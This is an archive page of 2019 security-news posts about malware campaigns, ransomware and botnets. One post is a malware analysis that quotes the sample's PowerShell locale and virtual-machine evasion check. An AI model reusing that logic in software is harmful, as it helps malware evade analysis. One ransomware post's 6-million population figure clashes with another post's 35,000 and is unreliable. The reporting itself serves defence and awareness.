Category Archives: Malware

Process Reimaging: A Cybercrook’s New Disguise for Malware

As of early 2019, Windows 10 is running on more than 700 million devices, including PCs, tablets, phones, and even some gaming consoles. However, it turns out the widespread Windows operating system has some inconsistencies as to how it specifically determines process image file locations on disk. Our McAfee Advanced Threat Research team decided to analyze these inconsistencies and as a result uncovered a new cyberthreat called process reimaging. Similar to process doppelganging and process hollowing, this technique evades security measures, but with greater ease since it doesn’t require code injection. Specifically, this technique affects the ability for a Windows endpoint security solution to detect whether a process executing on the system is malicious or benign, allowing a cybercrook to go about their business on the device undetected.

Let’s dive into the details of this threat. Process reimagining leverages built-in Windows APIs, or application programming interfaces, which allow applications and the operating system to communicate with one another. One API dubbed K32GetProcessImageFileName allows endpoint security solutions, like Windows Defender, to verify whether an EXE file associated with a process contains malicious code. However, with process reimaging, a cybercriminal could subvert the security solution’s trust in the windows operating system APIs to display inconsistent FILE_OBJECT names and paths. Consequently, Windows Defender misunderstands which file name or path it is looking at and can no longer tell if a process is trustworthy or not. By using this technique, cybercriminals can persist malicious processes executing on a user’s device without them even knowing it.

So, the next question is — what can Windows users do to protect themselves from this potential threat? Check out these insights to help keep your device secure:

  • Update your software. Microsoft has issued a partial fix that stops cybercriminals from exploiting file names to disguise malicious code, which helps address at least part of the issue for Windows Defender only. And while file paths are still viable for exploitation, it’s worth updating your software regularly to ensure you always have the latest security patches, as this is a solid practice to work into your cybersecurity routine.
  • Work with your endpoint security vendor. To help ensure you’re protected from this threat, contact your endpoint security provider to see if they protect against process reimaging.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Process Reimaging: A Cybercrook’s New Disguise for Malware appeared first on McAfee Blogs.

Riviera City In Florida Surrenders To Ransomware

Another U.S. city bites the dust, as Riviera, a city in Florida with a population of 6-million residents had its local government computers infected by a ransomware. City officials embarrassingly agreed to pay the ransomware authors demand, to the tune of $600,000 just to recover the city’s encrypted data. The amount is considered by the city officials as a lower cost solution, compared to the estimated $941,000 that the city needs to pay to rebuild the lost data from scratch.

The incident happened last May 29, 2019, caused by an incident when someone from Riviera Police team opened a malicious email containing ransomware. This caused the ransomware to penetrate the whole network used by the city government. It only took a few hours for the ransomware to encrypt all the Windows computers that were being used that day, only the emergency services department were able to operate in a limited fashion. City officials convened a high-level meeting to deliberate if the city government should spend $941,000 to rebuild the entire tech infrastructure of the city, but the council instead voted unanimously to just pay $600,000 worth of Bitcoins to the ransomware authors.

The trouble has been escalated given that the city government has not implemented a reliable backup system, that could have saved the city from paying hefty amounts to cybercriminals behind the ransomware. According to the report, even the City hold itself, city finance office and water pump stations are operating partially even if the computers being used are infected. It is highly embarrassing that the city just decided to surrender the possibility of its data being unencrypted by the very criminals that are behind the malware infection.

“This whole thing is so new to me and so foreign and it’s almost where I can’t even believe that this happens but I’m learning that it’s not as uncommon as we would think it is. Every day I’m learning how this even operates because it just sounds so far fetched to me,” explained KaShamba Miller-Anderson, Riviera Beach Council Charwoman.

The city itself operated under the same schedule, but many of the processes need to be done manually, like the salaries of the city government employees, which were handed over personally, instead of being deposited to the individual’s payroll bank accounts. The email system was completely shut down, while the VOIP phone service was in partial operations. The leadership believes that the city has no choice but to pay the ransom, as not only the current data that were locked down but as well as historical records of the city.

Riviera City was not the first city where its government decided to bite the bullet and pay the criminals what they were demanding. Here in, we have reported various incidents in the past about local governments which resorted to the same action, given their critical data were held, hostage. The only reliable method in order to fully recover from a ransomware infection without paying the ransomware demand is to have a reliable and secure backup infrastructure. In the age of a highly competitive cloud-storage market, it is not acceptable to run systems in production without any form of backup.

The post Riviera City In Florida Surrenders To Ransomware appeared first on .

Smashing Security #133: Cookie cock-ups, Hong Kong protests, and smart TV virus scans

We head to Hong Kong to look at how technology has helped anti-government protesters (and how China has tried to disrupt it), Samsung is skittish over whether to tell TV owners to virus-scan their devices, and you won’t believe whose website is not GDPR-compliant.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by James Thomson.

The Riviera Beach City pays $600,000 in ransom

The Riviera Beach City, Florida, agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system.

The Riviera Beach City Council voted unanimously to pay $600,000 in ransom to decrypt its records after a ransomware attack hit its systems. The council has previously agreed to spend $941,000 to modernize the entire IT infrastructure after hackers broke into the city’s system three weeks ago, ecrypting data managed by the City.

The internal IT staff has been working with security consultants to restore the operations, but according to them the only way to decrypt the information was to pay the ransom. 

“The Riviera Beach City Council voted unanimously this week to pay the hackers’ demands, believing the Palm Beach suburb had no choice if it wanted to retrieve its records, which the hackers encrypted.” reported the Associated Press. “Spokeswoman Rose Anne Brown said Wednesday that the city of 35,000 residents has been working with outside security consultants, who recommended the ransom be paid.”

The attack began on May 29, the infection started when an employee at the Riviera Beach police department opened a malicious email containing a link that once clicked has allowed infecting the PC.

The ransomware rapidly spread inside the Riviera Beach City infrastructure, causing several problems. The email system was disabled, employees and vendors were paid by check rather than direct deposit, the communications went down, 911 dispatchers being unable to accept calls even if the service continues to operate.

Initially, the city council decided to not pay the ransom, but due to the difficulties in restoring the operations, it opted out to pay.

On Monday, city officials participating to a rapid meeting unanimously voted to use the city’s insurance to pay a ransom of 65 bitcoins (~$603,000).

“The payment is being covered by insurance.” continues the AP. “The FBI on its website says it “doesn’t support” paying off hackers, but Riviera Beach isn’t alone: many government agencies and businesses do.”

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

“The FBI had no comment Wednesday on the Riviera Beach attack, but said 1,493 ransomware attacks were reported last year with victims paying $3.6 million to hackers — about $2,400 per attack. Some of those were against individuals.” concludes the AP.

Pierluigi Paganini

(SecurityAffairs – Riviera Beach City, hacking)

The post The Riviera Beach City pays $600,000 in ransom appeared first on Security Affairs.

Riviera Beach Pays Nearly $600K to Recover Data after Ransomware Attack

Riviera Beach paid bad actors approximately $600,000 in ransom to recover its information after it fell victim to a ransomware attack. On 17 June, the board of the Palm Beach County municipality voted unanimously to authorize that the city insurer pay 65 bitcoins (worth approximately $602,000 at the time of this writing) to those responsible […]… Read More

The post Riviera Beach Pays Nearly $600K to Recover Data after Ransomware Attack appeared first on The State of Security.

Bouncing Golf cyberespionage campaign targets Android users in Middle East

According to security researchers at Trend Micro, a cyberespionage campaign is targeting Android users in Middle Eastern countries.

Security researchers at Trend Micro have spotted a cyberespionage campaign, dubbed ‘Bouncing Golf, that is targeting Android users in Middle Eastern countries.

Threat actors are using a piece of malware detected as GolfSpy, that implements multiple features and can hijack the victim’s device.

GolfSpy could steal the following information:

  • Device accounts
  • List of applications installed in the device
  • Device’s current running processes
  • Battery status
  • Bookmarks/Histories of the device’s default browser
  • Call logs and records
  • Clipboard contents
  • Contacts, including those in VCard format
  • Mobile operator information
  • Files stored on SDcard
  • Device location
  • List of image, audio, and video files stored on the device
  • Storage and memory information
  • Connection information
  • Sensor information
  • SMS messages
  • Pictures

Attackers distributed the malware in tainted legitimate applications that are hosted on websites advertised on social media. The tainted applications pose as communication, news, lifestyle, book, and reference apps that are commonly used in the Middle East.

“We uncovered a cyberespionage campaign targeting Middle Eastern countries. We named this campaign “Bouncing Golf” based on the malware’s code in the package named “golf.”” reads the blog post published by Trend Micro. “The malware involved, which Trend Micro detects as  AndroidOS_GolfSpy.HRX, is notable for its wide range of cyberespionage capabilities. Malicious codes are embedded in apps that the operators repackaged from legitimate applications.”

According to the experts that have analyzed the command and control (C&C) servers used in the Bouncing Golf campaign, more than 660 Android devices have been infected with GolfSpy malware. The attackers appear to be focused on stealing military-related information.

The researchers speculate on a possible connection to Domestic Kitten espionage activities, an extensive surveillance operation conducted by Iranian APT actor aimed at specific groups of individuals since 2016.

Experts found some similarities between the similarly structured strings of code and the format of the data targeted for theft.

bouncing golf golfspy

The GolfSpy malware is also able to connect to a remote server to fetch and perform a broad range of commands such as searching for/listing/deleting/renaming files, downloading/uploading files to/from the device, taking screenshots, installing application packages (APK), recording audio and video, and updating the malware.

Once the malware is executed, it generates a unique ID and then collects targeted data and writes it to a file on the mobile device.

The malicious code allows the attackers to choose the data types to collect, stolen data is encrypted using a simple XOR operation with a pre-configured key, then it is sent to the C2 via HTTP POST requests.

GolfSpy also connects C2 via a socket in order to receive additional commands. In this case, stolen data is also sent to the C2 in encrypted forms via the socket, experts pointed out that the encryption key is different from the one used when data is sent via HTTP.

The operators behind the Bouncing Golf campaign attempt to cover their tracks, for example, they masked the registrant contact details of the C&C domains used in the campaign. The IP addresses associated with the C&C servers used in the campaign also appear to be located in many European countries, including Russia, France, Holland, and Germany.

“As we’ve seen in last year’s mobile threat landscape, we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity, employing tried-and-tested techniques to lure unwitting users.” Trend Micro concludes. “The extent of information that these kinds of threats can steal is also significant, as it lets attackers virtually take over a compromised device,”

Pierluigi Paganini

(SecurityAffairs – Bouncing Golf, hacking)

The post Bouncing Golf cyberespionage campaign targets Android users in Middle East appeared first on Security Affairs.

Botnets shift from Windows towards Linux and IoT platforms

Botnets in 2018 continued to use DDoS as their primary weapon to attack high-speed networks, according to NSFOCUS. Continuous monitoring and research of botnets discovered significant changes taking place in the coding of malware used to create bots, operations, and maintenance of botnets and IP Chain-Gangs. Throughout 2018, NSFOCUS developed profiles on 82 IP Chain-Gangs, groups of bots from multiple botnets acting in concert during specific cyber-attack campaigns. Understanding botnets in general and IP Chain-Gangs, … More

The post Botnets shift from Windows towards Linux and IoT platforms appeared first on Help Net Security.

Modular Plurox backdoor can spread over local network

Kaspersky experts recently discovered a backdoor dubbed Plurox that can spread itself over a local network and can allow installing additional malware. 

Kaspersky experts discovered the Plurox backdoor in February, it can spread itself over a local network and could be used by attackers to install additional malware. 

The Plurox backdoor is written in C and compiled with Mingw GCC, it communicates with the command and control (C&C) server using the TCP protocol. The malware has a modular structure, it uses a variety of plugins to implements its functionalities. 

“The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers.” reads the analysis published by Kaspersky. “What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.”

The analysis of the code revealed the presence of debug lines, a circumstance that suggests the malware was at the testing stage when it was first spotted.

The Plurox backdoor uses two different ports to load plugins, the ports along with the C&C addresses are hardcoded into the source code of the malware. 

Monitoring the backdoor’s activity, experts discovered two “subnets.” One subnet is used to provide only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) to the Plurox backdoor. The other one, besides miners (auto_opencl_amd, auto_miner), is used to pass several plugins to the malware.

The Plurox backdoor supports the following commands:

  • Download and run files using WinAPI CreateProcess
  • Update bot
  • Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
  • Download and run plugin
  • Stop plugin
  • Update plugin (stop process and delete file of old version, load and start new one)
  • Stop and delete plugin

The backdoor allows delivering the proper cryptocurrency miners depending on the system configuration.  

The researchers observed eight mining modules that were used to infect systems running on different processors: auto_proc, auto_cuda, auto_miner, auto_opencl_amd, auto_gpu_intel, auto_gpu_nvidia, auto_gpu_cuda, and auto_gpu_amd. 

Experts also discovered that the Plurox backdoor also supports a UPnP plugin designed to target a local network. 

“The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network. ” states the report.

In case the administrators will detect the attack on the host, they will see the attack coming directly from the router, not from a local machine.

The UPnP plugin is similar to the EternalSilence exploit, with the difference that Plurox forwards TCP port 135 instead of 139. 

The backdoor uses the SMB plugin for spreading over the network using the EternalBlue exploit.

The module borrows the code from the Trickster Trojan, the researchers believe that the authors of Plurox and Trickster may be linked.


Further technical details, including IoCs are reported in the analysis published by Kaspersky.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post Modular Plurox backdoor can spread over local network appeared first on Security Affairs.

Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group

The head of London’s Serpentine Galleries resigned on Tuesday following a Guardian report about her links to the Israeli surveillance firm NSO Group.

On Tuesday, the chief executive of London’s Serpentine Galleries, Yana Peel, resigned following the revelation of the Guardian newspaper about her links to the Israeli surveillance firm NSO Group.

According to the newspaper, Yana Peel is the co-owner of the controversial Israeli company. The board of trustees of the galleries has accepted Peel’s resignation.

“The head of the Serpentine Galleries has resigned after the Guardian revealed she is the co-owner of an Israeli cyberweapons company whose software has allegedly been used by authoritarian regimes to spy on dissidents.” reads the post published by the Guardian.

“On Tuesday, Yana Peel announced she was stepping down as the chief executive of the prestigious London art gallery so the work of the Serpentine would not be undermined by what she called“misguided personal attacks on me and my family”.

Last week, the Guardian revealed that Yana Peel is one of the owners of the private equity firm Novalpina Capital, co-founded by Peel’s husband, Stephen, that has the majority of the shares in NSO Group.

“I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role.” Peel said

The principal product of the NSO Group is a surveillance software called Pegasus, it allows to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.

NSO Group Pegasus spyware

Pegasus is a perfect tool for surveillance, it is able to steal any kind of data from smartphones and use them to spy on the surrounding environment through their camera and microphone.

The NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigations of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International was corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.

Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

“The work of the Serpentine – and its incomparable artistic director – cannot be allowed to be undermined by misguided personal attacks on me and my family. These attacks are based upon inaccurate media reports now subject to legal complaints.” Peel said. “I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role,” it continued.” 

Pierluigi Paganini

(SecurityAffairs – NSO group, Surveillence)

The post Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group appeared first on Security Affairs.

What is Malware?

Any person who has ever used a computer has probably heard the term “malware.” It is everywhere, and the general consensus is that we have to be careful and protect ourselves from it. But what is the malware definition? What is it and why are people afraid of it?

The first thing you have to know when it comes to malware definition is that it is a software much like any other program on your computer. However, its intention is to inhibit, damage, or disable your computer system without your knowledge. It is a malicious software, hence the term.

Today, malware attacks continue to grow. They have become more frequent, and malware definition has become more sophisticated. Detecting and resolving these issues have become harder and harder as time goes by. With every new defense, there seems to be two new malware out there. And if they get into your system, they will steal proprietary data from your computer, thus causing major damage before they are even detected.

Defending Against Malware Attacks

Now that you know the malware definition, the next step is to protect yourself against it. This is especially true for organizations such as schools and businesses, where sensitive information can be stolen by these programs. So, the first thing to do is educate people in recognizing potential attacks and vulnerabilities. Everyone should follow a proactive approach in defending against these threats.

Security Updates

Everyone should install security updates and patches from known sources immediately as they become available. These updates give your defenses more ways in identifying new malware definition and threats. Updating is particularly important in commonly used programs.

Avoid and Report Suspicious Emails

When receiving emails from unknown sources, do not click on any attachment, file, or link that is in there. They can contain malware. Instead, report this to your IT personnel so they can properly investigate if this is a safe email or if it is an attempted attack.

If you accidentally click on the link or files, immediately report it to your IT or security personnel so they can track, analyze, and attempt to mitigate the attack.

Avoid Suspicious Websites

Websites without security protocols are breeding grounds of malware. Try to avoid these websites as much as possible. Malware definition shows that upon entering such websites, your computer may immediately become infected.

Use Your Firewall

Computer systems today should have firewalls that create a barrier against such threats. Make sure that yours is always turned on so you have a blanket of security.

Use Anti-virus/Anti-malware Programs

If there are malicious programs, there are anti-malicious programs as well. These are designed to identify any and all malware definitions and protect you from them. It scans all your files, especially areas most commonly infected, to detect and resolve them. These programs also help in proactively defending your computer from malicious attacks.

Limit App Privileges

When a malware successfully enters your computer, it requires full access in order to run properly. With that malware definition in mind, what you can do is make use of account controls to limit what programs can do without your permission. This will then notify you whenever any program is attempting to make changes to your computer, and you can stop it right then and there.

By following these simple practices thanks to your knowledge of malware definition, you and your employees can help mitigate the risk of being infected with malware. These should become a habit for everyone, so it is recommended to enforce these practices on every user of the network. Only by creating a layered defense can an organization be safe from cyber attacks.

Related Resources:

Different Types of Malware

Static Malware Analysis Vs Dynamic Malware Analysis

The post What is Malware? appeared first on .

A free Decryptor tool for GandCrab Ransomware released

Good news for the victims of the latest variants of the GandCrab ransomware, NoMoreRansomware released a free decryption tool.

Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a free decryptor tool released on the the NoMoreRansom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4. 

“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on” reads the press release published by the Eurpol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”

The GandCrab decryptor tool is the result of a partnership with law enforcement agencies from Austria (Bundeskriminalambt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.

The ransomware appeared in the threat landscape early 2018 when experts at cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in Russian hacking community on the dark web, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

In more than one year its operators released several versions with numerous enhancements, but in June they announced they are shutting down their operation and affiliates are being told to stop distributing the ransomware.

GandCrab ransomware V4

In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

The operators revealed they have generated more than $2 billion in ransom payments, earning on average of $2.5 million dollars per week. The operators also declared to have earned a net of $150 million that now have invested in legal activities.

Experts at BitDefender pointed out that not all victims are treated equally:

“GandCrab prioritizes ransomed information and sets individual pricing by type of victim.” read a blog post published by BitDefender. “An average computer costs from $600 and $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click,”

According to the Europol, previously released tools for the GandCrab ransomware have helped more than 30 000 victims recover their data for free and save roughly $50 million in unpaid ransoms. 

The joint efforts have also weakened the operators’ position on the cyber crime market and have led to the demise and shutdown of the operation by authorities. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat. 

You can download the GandGrab decryption tool for free at the following address:

Pierluigi Paganini

(SecurityAffairs – ransomare, decryptor tools)

The post A free Decryptor tool for GandCrab Ransomware released appeared first on Security Affairs.

NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid

According to The New York Times, the United States planted destructive malware in Russia’s electric power grid.

The New York Times, citing current and former government officials, revealed that the United States planted a potentially destructive malware in Russia’s electric power grid.

The U.S. cyber army is targeting the Russian power grid since at least 2012 with reconnaissance operations, but recently it also carried out more offensive operations. According to the officials, US cyber soldiers attempted to deploy destructive malware inside the Russian power grid.

“Since at least 2012, current and former officials say, the United States has put reconnaissance probes into the control systems of the Russian electric grid.” states the NYT.

“But now the American strategy has shifted more toward offense, officials say, with the placement of potentially crippling malware inside the Russian system at a depth and with an aggressiveness that had never been tried before.”

Russian power grid

The hacking operations aimed at warning the Russian Government about the cyber capabilities of the U.S. Cyber Command and that could be used as a deterrent to the continuous interference attributed to Russian state-sponsored hackers. It is important to highlight that we have evidence that the malware used by the US Cyber units caused any disruption to the target systems.

President Trump publicly denied the revelation made by the NYT:

The New York Times added that according to two US officials Trump was completely informed about cyber operations conducted by the US Cyber Command. High officials inside the US Cyber Command might have hidden the details of the cyber attacks inside the Russian power grid fearing a possible reaction of the President due to its relationship with President Putin.

“Two administration officials said they believed Mr. Trump had not been briefed in any detail about the steps to place “implants” — software code that can be used for surveillance or attack — inside the Russian grid.” continues the newspaper.

“Pentagon and intelligence officials described broad hesitation to go into detail with Mr. Trump about operations against Russia for concern over his reaction — and the possibility that he might countermand it or discuss it with foreign officials, as he did in 2017when he mentioned a sensitive operation in Syria to the Russian foreign minister.”

In July 2018, the US Department of Homeland Security declared that Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and continue to target them.

“In the past few months, Cyber Command’s resolve has been tested. For the past year, energy companies in the United States and oil and gas operators across North America discovered their networks had been examined by the same Russian hackers who successfully dismantled the safety systems in 2017 at Petro Rabigh, a Saudi petrochemical plant and oil refinery.” concludes the NYT.

“The question now is whether placing the equivalent of land mines in a foreign power network is the right way to deter Russia. While it parallels Cold War nuclear strategy, it also enshrines power grids as a legitimate target.”

Pierluigi Paganini

(SecurityAffairs – Russian power grid, hacking)

The post NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid appeared first on Security Affairs.

New phishing campaign targets bank customers with WSH RAT

Security researchers at Cofense have spotted a phishing campaign aimed at commercial banking customers distributing a new remote access trojan (RAT) tracked as WSH RAT.

Security experts at Cofense Phishing Defence Center have spotted a phishing campaign aimed at commercial banking customers that is distributing a new remote access trojan tracked as WSH RAT.

The name WSH likely refers to the legitimate Windows Script Host, which is an application used to execute scripts on Windows machines.

Threat actors are using the RAT to deliver keyloggers and information stealers.

“The Cofense Phishing Defense Center™ (PDC)  and Cofense Intelligence™ have identified a new variant of Houdini Worm targeting commercial banking customers with campaigns containing either URLs, .zip, or .mht files.” reads the analysis published by Cofence. “This new variant is named WSH Remote Access Tool (RAT) by the malware’s author and was released on June 2, 2019. Within five days, WSH RAT was observed being actively distributed via phishing. “

WSH Remote Access Tool (RAT) is a variant of the VBS (Visual Basic Script) based Houdini Worm (H-Worm) that first appeared in the threat landscape in 2013 and was updated in 2016.

WSH Remote Access Tool (RAT) differs from Houdini because it is in JavaScript and uses a different User-Agent string and delimiter character when communicating with its command-and-control (C2) server.

The phishing messages contain an MHT file that includes a href link which once opened, will direct victims to a .zip archive containing a version of WSH RAT.

WSH RAT attack

The RAT allows attackers to steal sensitive data, including passwords from victims’ browsers and email clients, it also implements keylogging capabilities. The experts pointed out that the RAT allows to remotely control the victim’s systems, it is also able to kill anti-malware solutions and disable the Windows UAC.

The authors of the malware are offering for rent the WSH RAT, buyers can pay a subscription fee of $50 per month to use all features they have implemented.

“WSH RAT is being sold for $50 USD a month and has an active marketing campaign.” continues the post. “The threat operators tout the RAT’s many features such as WinXP-Win10 compatibility, several automatic startup methods, and a large variety of remote access, evasion, and stealing capabilities.”

Once the RAT reached the C2 server, WSH RAT will download and drop three additional files having .tar.gz extension but that are actually PE32 executable files

The three downloaded payloads are a keylogger, a mail credential viewer, a browser credential viewer. The three components are from third parties and were not developed by the WSH RAT operator.

The three malicious tools are a keylogger, a mail credential viewer, and a browser credential viewer developed by third parties and used by the campaign operators to collect credentials and other sensitive information.

“This re-hash of Hworm proves that threat operators are willing to re-use techniques that still work in today’s IT environment. The phishing campaign that delivered the .zip containing a MHT file was able to bypass the Symantec Messaging Gateway’s virus and spam checks.” continues the post.

Experts published a list of indicators of compromise (IOCs).

Pierluigi Paganini

(SecurityAffairs – WSH Remote Access Trojan, hacking)

The post New phishing campaign targets bank customers with WSH RAT appeared first on Security Affairs.

From Targeted Attack to Untargeted Attack

Today I’d like to share an interesting and heavily obfuscated Malware which made me thinking about the meaning of ‘Targeted Attack’.

Nowadays a Targeted Attack is mostly used to address state assets or business areas. For example a targeted attack might address Naval industry (MartyMcFly example is definitely a great example) or USA companies (Botnet Against USA, Canada and Italy is another great example) and are mainly built focusing specific target sectors. When I looked into at the following sample (which is a clear stereotype of an increasing trend of similar threats) I noticed a paradigm shift from: “What to target” to “what to untarget”. In other words it looks like the attacker does’t have a clear vision about his desired victims but contrary he has real clear intentions to what kind of victims must be avoided. But let’s start from the beginning.

Looking for a public sample submitted to Yomi (Yoroi’s public SandBox system) it caught my eyes the following one (sha256: c63cfa16544ca6998a1a5591fee9ad4d9b49d127e3df51bd0ceff328aa0e963a)

Public Submitted Sample on Yomi

The file looks like a common XLS file within low Antivirus detection rate as shown in the following image (6/63).

Antivirus Detection Rate

By taking a closer look to the Office file it’s easy to spot “Auto Open” procedures in VBA. The initial script is obfuscated through integer conversion and variable concatenation. A simple break-point and a message box to externalize the real payload would be enough to expose the second stage, which happens to be written in powershell.

Deobfuscated Stage1 to Obfuscate Stage2

The second stage is obfuscated through function array enumeration and integer conversion as well. It took some minutes to understand how to move from the obfuscated version to a plain text readable format as shown in the next picture.

Stage2 Obfuscated
Stage2 DeObfuscated

Here comes the interesting side of the entire attack chain (at least in my persona point of view). As you might appreciate from the deo-bfuscated Stage2 code (previous image) two main objects are downloaded and run from external sources. The ‘*quit?’ object downloads a Windows PE (Stage3_a) and runs it, while the ‘need=js’ object returns an additional obfuscated javascript stage, let’s call it Stage3_b. We’ll take care about those stages later on, for now let’s focus on the initial conditional branch which discriminates the real behavior versus the fake behavior; in other words it decides if run or stop the execution of the real behavior. While the second side of the conditional branch is quite a normal behavior match "VirtualBox|VMware|KVM",which tries to avoid the execution on virtual environments (trying to avoid detection and analysis), the first side is quite interesting. (GET-UICulture).Name -match "RO|CN|UA|BY|RU" tries to locate the victim machine and decides to attack everybody but not Romania, Ukraine, China, Russia and Belarus. So we are facing an one’s complement to targeted attack. I’d like to call it “untargeted” attack, which is not an opportunistic attack. Many questions come in my mind, for example why do not attack those countries ? Maybe does the attacker fear those countries or does the attacker belong to that area ? Probably we’ll never get answers to such a questions but we might appreciate this intriguing attack behavior. (BTW, I’m aware this is not the first sample with this characteristic but I do know that it’s a increasing trend). But let’s move on the analysis.


Stge3_b is clearly the last infection stage. It looks like a romantic Emotet according to many Antivirus so I wont invest timing into this well-known Malware.


This stage looks like a quite big and obfuscated Javascript code. The obfuscation implements three main techniques:

  • Encoded strings. The strings have been encoded in different ways, from “to Integer” to “Hexadecimal”.
  • String concatenation and and dynamic evaluation. Using eval to dynamically extract values which would be used to decode more strings
  • String Substitutions. Through find and replace functions and using loop to extract sub-strings the attacker hides the clear text inside charset noise

After some “hand work” finally Stage3_b deobfuscated came out. The following image shows the deobfuscation versus obfuscation section. We are still facing one more obfuscated stage, lets call it Stage4_b which happens to be, again, an obfuscated powershell script… how about that !?

Stage3_b Obfuscated
Stage3_b Deobfuscated (obfuscated Stage4_b)

Stage4_b uses the same obfuscation techniques seen in Stage2, so let’s use the same deobfusction technique, so let’s do it ! Hummm, but .. wait a minute… we already know that, it’s the deobfuscated Stage2! So we have two command and control servers serving the final launching script and getting persistence on the victim.

Deobfuscated Stage4_b


Even if the Sample is quite interesting per-se – since getting a low AV detection rate – it is not my actual point today. What is interesting is the introduction of another “targeting” state. We were accustomed to see targeted attacks, by meaning of attacks targeting specific industries or specific sectors or specific states, and opportunistic attacks, by meaning of attacks spread all over the world without specific targets. Today we might introduce one more “attack type” the untargeted attack, by meaning of attacking everybody but not specific assets, industries or states (like in this analyzed case)

Further technical details, including IoCs and Yara rules are reported in the original post published on the Marco Ramilli’s blog:

About the author Marco Ramilli

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – targeted attack, hacking)

The post From Targeted Attack to Untargeted Attack appeared first on Security Affairs.

New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits

Operators behind the Echobot botnet added new exploits to infect IoT devices, and also enterprise apps Oracle WebLogic and VMware SD-Wan.

Recently a new botnet, tracked Echobot, appeared in the threat landscape its operators are adding new exploits to infect a broad range of systems, including IoT devices, enterprise apps Oracle WebLogic and VMware SD-Wan.

The Echobot botnet was first detected by experts at PaloAlto Networks early this month, the botnet is based on the dreaded Mirai botnet. At the time of its discovery, operators added 8 new exploits, but currently, it includes 26 exploits.

The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.

“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.

“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”

Cashdollar published a table comparing the two versions of Echobot and the exploits they use.

Echobot targets

The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.

